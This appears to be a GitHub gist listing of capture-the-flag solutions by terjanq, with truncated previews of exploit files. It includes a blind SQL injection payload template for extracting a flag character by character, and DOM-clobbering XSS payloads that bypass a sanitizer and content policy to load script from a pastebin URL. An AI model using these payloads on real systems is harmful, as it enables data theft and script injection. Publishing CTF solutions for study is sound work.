terjanq
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # The solution comes from the paper https://sci-hub.tw/10.1007/BF03025305 | |
| # Which I got from p4 team. | |
| import random | |
| from math import factorial | |
| SET_SIZE = 8 | |
| MAX_VAL = 40000 | |
| # get random 8 integers |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from flask import Flask | |
| import time | |
| import requests | |
| import os | |
| import re | |
| import sys | |
| app = Flask(__name__) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * This is a solution to "Car repair shop" challenge from hack.lu ctf 2019 | |
| * Solves: 9 | |
| * 10/23/2019 © by terjanq | |
| */ | |
| /* The idea of the solution is: */ | |
| function WoW(){ this.Oo = 'O.o'; } | |
| var x = new WoW(); |
terjanq
/ exploit.js
Last active
August 5, 2023 10:42
This is a solution of Oracle v2 and Oracle v1 from https://nn9ed.ka0labs.org/challenges#x-oracle%20v2 (I realized I could use <meta> and redirect admin to my website and run the challenge in iframes after I already solved it with bruteforcing the admin :p)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const fetch = require('node-fetch'); | |
| var flag = 'nn9ed{' | |
| var alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!().{}' | |
| var escape = d => d.replace(/\\/g, '\\\\').replace(/\./g, '\\.').replace(/\(/g, '\\(').replace(/\)/g, '\\)').replace(/\{/g, '\\{').replace(/\}/g, '\\}'); | |
| var make_payload = (i, o) => `Season 6%' AND 1=IF(ORD(SUBSTR(flag,${i},1))=${o},1,EXP(44444)) #` // throws an exception if the character of flag is incorrect | |
| const base_url = 'http://x-oracle-v2.nn9ed.ka0labs.org/' | |
| // Generates definitions for fonts | |
| function generateFonts() { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- 225 char solution (remove new lines) --> | |
| <a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol> | |
| <form id=CONFIG> | |
| <img id=testPath name=test> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- Solution 214 - with a strange behaviour in browsers (remove new lines) --> | |
| <a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol> | |
| <form id=CONFIG> | |
| <img id=test> | |
| <a> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- Solution 212! (remove new lines) --> | |
| <a id=CONFIG name=test> | |
| <p> | |
| <a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol> | |
| <p> | |
| T |
terjanq
/ straight-forward-solution.html
Last active
September 23, 2019 15:45
XSS Challenge DOM Clobbering
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <a href="https://pastebin.com" id="testPath"></a> | |
| <a id="CONFIG" name=test></a> | |
| <a id="CONFIG" name="version" href="cid:/../../../../how-can-i-escape-this%2f..%2fraw/LiE18yqs?"></a> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| window.CONFIG = window.CONFIG || { | |
| version: "v20190816", | |
| test: false, | |
| appName: "XSS Challenge", | |
| } | |
| function loadModule(moduleName) { | |
| const scriptSrc = new URL(document.currentScript.src); | |
| let url = ''; | |
terjanq
/ injection_point.js
Created
September 23, 2019 14:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const sanitized = DOMPurify.sanitize(input.value); | |
| const html = ` | |
| <meta http-equiv=Content-Security-Policy content="script-src https://pastebin.com/how-can-i-escape-this/ 'nonce-xyz' https://securitymb.github.io/xss/1/modules/v20190816/"> | |
| <h1>Homepage!</h1> | |
| <p>Welcome to my homepage! Here are some info about me:</p> | |
| ${sanitized} | |
| <script nonce=xyz src="./main.js"><\/script> | |
| `; |